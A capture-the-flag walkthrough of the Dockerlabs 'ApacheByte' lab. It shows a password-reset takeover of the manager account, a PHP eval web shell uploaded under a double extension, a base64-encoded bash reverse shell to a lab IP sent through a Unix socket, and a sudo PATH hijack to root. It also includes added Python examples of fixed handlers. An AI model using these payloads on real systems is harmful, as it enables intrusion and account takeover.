
Dockerlabs-ApacheByte

Tags: Dockerlabs, Linux
Author: HYH

Box Info

OS: Linux
Difficulty: Medium

Nmap

[root@kali] /home/kali/ApacheByte  
❯ nmap 172.17.0.3 -sV -A -p-             

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 1b:a6:6b:55:9c:c7:98:b3:ac:01:00:21:2f:67:9a:3e (ECDSA)
|_  256 68:bd:c1:ad:61:e1:5d:e9:2b:f8:d1:f1:7d:16:fe:4c (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Blog
|_http-server-header: Apache/2.4.58 (Ubuntu)

Change Passwd

On the web side, register any account and open account.php, which lets you upload an avatar or change your password. The avatar upload accepts image formats only, and the uploaded file shows up under /uploads/.

That reveals a path, and note that the directory also contains another image.
Try the password-change form: set numero to that other image's name to change the administrator's password. The administrator's username here is manager.

POST /account.php HTTP/1.1
Host: 172.17.0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Origin: http://172.17.0.3
Connection: keep-alive
Referer: http://172.17.0.3/account.php
Cookie: PHPSESSID=q91irqueoc3m1hm82jofksmco6
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=manager&numero=5597527595641235&new_password=123456&confirm_password=123456
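The password change above works because account.php takes the target account from the request body rather than from the session. The following Python model is added here and is not code from the box: it shows that pattern beside a handler that binds the change to the logged-in user and demands the current password. The field names come from the captured request; the user table, the session parameter, and the reading of numero as the per-user number that also names the avatar under /uploads/ are constructed assumptions for the example.

```python
"""
Added example, not the ApacheByte box's code: a model of the account.php
password-change handler. The vulnerable function takes the target account
from the posted username/numero, so any logged-in user can reset another
user's password; the fixed function uses only the server-side session and
requires the current password. The user table, session parameter and the
meaning of numero (assumed to be the per-user number that also names the
avatar under /uploads/) are constructed for this example.
"""
import hashlib
import hmac
import os
from urllib.parse import parse_qs

# Body captured in the writeup, reused here as the sample request.
BODY = ("username=manager&numero=5597527595641235"
        "&new_password=123456&confirm_password=123456")


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


def make_users() -> dict:
    """Constructed user table: two accounts with salted PBKDF2 hashes."""
    users = {}
    for name, numero, pw in [("manager", "5597527595641235", "Adm1n-Pass"),
                             ("hyh", "1111222233334444", "hunter2")]:
        salt = os.urandom(16)
        users[name] = {"numero": numero, "salt": salt, "hash": _hash(pw, salt)}
    return users


def check_password(users: dict, name: str, password: str) -> bool:
    u = users[name]
    return hmac.compare_digest(_hash(password, u["salt"]), u["hash"])


def _fields(body: str) -> dict:
    return {k: v[0] for k, v in parse_qs(body).items()}


def _set_password(users: dict, name: str, new_password: str) -> None:
    salt = os.urandom(16)
    users[name].update(salt=salt, hash=_hash(new_password, salt))


def vulnerable_change(users: dict, session_user: str, body: str) -> str:
    """Broken access control: the account to modify is chosen by the client.
    session_user is deliberately ignored, as the box's handler appears to do."""
    f = _fields(body)
    if f.get("new_password") != f.get("confirm_password"):
        return "password mismatch"
    target = f.get("username", "")
    if target not in users or users[target]["numero"] != f.get("numero"):
        return "no such user"
    _set_password(users, target, f["new_password"])
    return f"changed {target}"


def fixed_change(users: dict, session_user: str, body: str) -> str:
    """Identity comes from the authenticated session only, and the caller must
    prove knowledge of the current password before it is replaced."""
    f = _fields(body)
    if f.get("new_password") != f.get("confirm_password"):
        return "password mismatch"
    if not check_password(users, session_user, f.get("current_password", "")):
        return "current password required"
    _set_password(users, session_user, f["new_password"])
    return f"changed {session_user}"


if __name__ == "__main__":
    db = make_users()
    print(vulnerable_change(db, "hyh", BODY))   # changed manager
    db = make_users()
    print(fixed_change(db, "hyh", BODY))        # current password required
```

The fixed handler never reads username or numero at all; the only identity that matters is the one the session already proved, and knowledge of the current password stops a hijacked session cookie from becoming a permanent account takeover.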

Dirsearch

[root@kali] /home/kali/ApacheByte  
❯ dirsearch -u http://172.17.0.3/ -H 'Cookie: PHPSESSID=5hjb4v5kq0o8agclt30qlst94g'

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                         
                                                                                                                                                
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://172.17.0.3/

[04:00:44] Scanning:                                                                                                                            
[04:00:45] 403 -   275B - /.php                                             
[04:00:46] 200 -    2KB - /account.php                                      
[04:00:49] 200 -    6KB - /dashboard.php                                    
[04:00:50] 200 -     0B - /db.php                                           
[04:00:51] 200 -    2KB - /index.php                                        
[04:00:51] 200 -    2KB - /index.php/login/                                 
[04:00:51] 301 -   307B - /libs  ->  http://172.17.0.3/libs/                
[04:00:52] 200 -    2KB - /login.php                                        
[04:00:52] 302 -     0B - /logout.php  ->  index.php                        
[04:00:53] 301 -   308B - /posts  ->  http://172.17.0.3/posts/              
[04:00:54] 200 -    2KB - /register.php                                     
[04:00:54] 403 -   275B - /server-status/                                   
[04:00:54] 403 -   275B - /server-status
[04:00:55] 302 -     0B - /upload.php  ->  index.php                        
[04:00:55] 301 -   310B - /uploads  ->  http://172.17.0.3/uploads/          
[04:00:55] 200 -   937B - /uploads/                                         
                                                                             
Task Completed         

Upload

Try an upload test against upload.php.

The upload succeeds, but it can't be exploited 😢. Look at dashboard.php instead: images can be inserted into posts, and note that the stored file name 👇 no longer has the .jpg suffix.
Uploading a test.jpg shows that only the last extension is cut off.
So if shell.php.jpg is uploaded, the resulting URL ends in shell.php.

POST /dashboard.php HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://172.17.0.2/dashboard.php
Content-Type: multipart/form-data; boundary=---------------------------214814890021625795424255400148
Content-Length: 380
Origin: http://172.17.0.2
Connection: keep-alive
Cookie: PHPSESSID=pthfg0f9kc8tku82pmafdssd2h
Priority: u=4

-----------------------------214814890021625795424255400148
Content-Disposition: form-data; name="ajax_upload"

1
-----------------------------214814890021625795424255400148
Content-Disposition: form-data; name="image"; filename="shell.php.jpg"
Content-Type: application/x-php

<?php eval($_POST["cmd"]);?>

-----------------------------214814890021625795424255400148--

That gives command execution.
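The naming bug behind the dashboard.php upload is that the server strips exactly one extension and keeps whatever is left. The Python below is an added example, not the box's upload code: it models that flawed behaviour next to an upload check that allow-lists the extension, verifies the file's magic bytes, and replaces the client-supplied name with a random one. The sample inputs are constructed, and the flawed function only reproduces what the writeup observed.

```python
"""
Added example, not the box's upload code: the "drop only the last
extension" naming observed above, which turns shell.php.jpg into shell.php,
beside an upload check that allow-lists the extension, verifies the file's
magic bytes, and replaces the client's name with a random one. Sample
inputs are constructed; the flawed behaviour is modelled from the writeup.
"""
import os
import secrets

# Allowed image types and the leading bytes each must start with.
ALLOWED_MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def flawed_store_name(filename: str) -> str:
    """Models the observed behaviour: only the final extension is removed,
    so a double extension leaves an executable name behind."""
    base, _ext = os.path.splitext(os.path.basename(filename))
    return base


def check_upload(filename: str, content: bytes) -> tuple:
    """Return (accepted, stored_name_or_reason).

    The client-supplied name and Content-Type header (application/x-php in
    the captured request) are never trusted: the extension must be on the
    allow-list and the content must carry that type's magic bytes."""
    name = os.path.basename(filename)
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED_MAGIC:
        return False, f"extension not allowed: {ext or '(none)'}"
    if not content.startswith(ALLOWED_MAGIC[ext]):
        return False, "content does not match the declared image type"
    # The stored name is random and carries only the allow-listed extension,
    # so nothing from the original filename reaches the filesystem or a URL.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    php = b'<?php eval($_POST["cmd"]);?>'
    print(flawed_store_name("shell.php.jpg"))        # shell.php
    print(check_upload("shell.php.jpg", php))         # (False, ...)
    print(check_upload("avatar.jpg", b"\xff\xd8\xff\xe0" + b"\0" * 16))
```

Naming is only half of the fix: the upload directory should also be served with script execution disabled, so that a file which slips through the check is still delivered as static content rather than run by the server.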

Own juan

Under /tmp there is a .sock file, owned by user juan.

www-data@26ec94ce92f3:/tmp$ ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   2800  1652 ?        Ss   11:01   0:00 /bin/sh -c service ssh start && service apache2 start && service juan_socket 
root          15  0.0  0.0  12020  3040 ?        Ss   11:01   0:00 sshd: /usr/sbin/sshd [listener] 0 of 10-100 startups
root          33  0.0  0.2 203872 22332 ?        Ss   11:01   0:00 /usr/sbin/apache2 -k start
www-data      38  0.0  0.3 204868 29044 ?        S    11:01   0:00 /usr/sbin/apache2 -k start
www-data      39  0.0  0.3 204604 25992 ?        S    11:01   0:00 /usr/sbin/apache2 -k start
www-data      40  0.0  0.2 204604 20380 ?        S    11:01   0:00 /usr/sbin/apache2 -k start
www-data      41  0.0  0.2 204664 20280 ?        S    11:01   0:00 /usr/sbin/apache2 -k start
www-data      42  0.0  0.2 204728 19844 ?        S    11:01   0:00 /usr/sbin/apache2 -k start
juan          51  0.0  0.1  15492 10572 ?        S    11:01   0:00 /usr/bin/python3 /home/juan/socket_server.py
mysql         81  0.0  0.0   2800  1876 ?        S    11:01   0:00 /bin/sh /usr/bin/mysqld_safe
mysql        229  0.5  5.2 2442844 426164 ?      Sl   11:01   0:07 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/li
root         295  0.0  0.0   2728  1488 ?        S    11:01   0:00 tail -f /dev/null
www-data     296  0.0  0.3 204732 25504 ?        S    11:01   0:00 /usr/sbin/apache2 -k start
www-data     297  0.0  0.2 204736 20860 ?        S    11:02   0:00 /usr/sbin/apache2 -k start
www-data     302  0.0  0.0   4324  3324 ?        S    11:13   0:00 bash
www-data     330  0.0  0.1  17588 12928 ?        S    11:13   0:00 /usr/bin/python3 -Wignore -c import base64,zlib;exec(zlib.decompress(base64.b
www-data     331  0.0  0.0   4972  4068 pts/0    Ss   11:13   0:00 /usr/bin/bash -i
root         411  0.0  0.0   4588  3952 pts/1    Ss+  11:22   0:00 /bin/bash
www-data     427  0.0  0.0   8284  4252 pts/0    R+   11:23   0:00 ps aux
www-data@26ec94ce92f3:/tmp$ ls -al
total 376
drwxrwxrwt 1 root     root       4096 Jun  8 11:19 .
drwxr-xr-x 1 root     root       4096 Jun  8 11:01 ..
srwxrwxrwx 1 juan     juan          0 Jun  8 11:01 dev.sock
-rwxr-xr-x 1 www-data www-data 375176 Apr 22 15:08 socat

Upload a socat binary and connect to the socket. It appears to execute what it receives, with no output echoed back, and it seems to accept only Python code.

www-data@26ec94ce92f3:/tmp$ ./socat - UNIX-CONNECT:/tmp/dev.sock
id
Executed.
www-data@26ec94ce92f3:/tmp$ ./socat - UNIX-CONNECT:/tmp/dev.sock
whoami
name 'whoami' is not defined
www-data@26ec94ce92f3:/tmp$ ./socat - UNIX-CONNECT:/tmp/dev.sock
print(123)
Executed.

So use a reverse shell here:

import os;os.system("printf KGJhc2ggPiYgL2Rldi90Y3AvMTcyLjE3LjAuMS81NTU1IDA+JjEpICY=|base64 -d|bash");

Own alex

Check sudo -l

juan@26ec94ce92f3:~$ sudo -l
Matching Defaults entries for juan on 26ec94ce92f3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User juan may run the following commands on 26ec94ce92f3:
    (alex) NOPASSWD: /bin/nano

Root

alex@26ec94ce92f3:~$ sudo -l
Matching Defaults entries for alex on 26ec94ce92f3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User alex may run the following commands on 26ec94ce92f3:
    (ALL) NOPASSWD: /usr/local/bin/report_tool

Look at the script's contents

#!/bin/bash
#
# report_tool: shows the date or, if an override exists, uses your local PATH

CONF_FILE="./report_tool.conf"
if [ -r "$CONF_FILE" ]; then
    source "$CONF_FILE"
    if [ -n "$OVERRIDE_PATH" ]; then
        export PATH="$OVERRIDE_PATH:$PATH"
    fi
fi
exec date

Note the source line: the script sources report_tool.conf from the current working directory, and the OVERRIDE_PATH it sets is prepended to PATH before the unqualified exec date, so this can be used for PATH hijacking.

alex@26ec94ce92f3:~$ echo -e '#!/bin/bash\n/bin/bash' > date
alex@26ec94ce92f3:~$ chmod +x date
alex@26ec94ce92f3:~$ echo 'OVERRIDE_PATH=.' > report_tool.conf
alex@26ec94ce92f3:~$ sudo /usr/local/bin/report_tool
root@26ec94ce92f3:/home/alex# id
uid=0(root) gid=0(root) groups=0(root)
root@26ec94ce92f3:/home/alex# 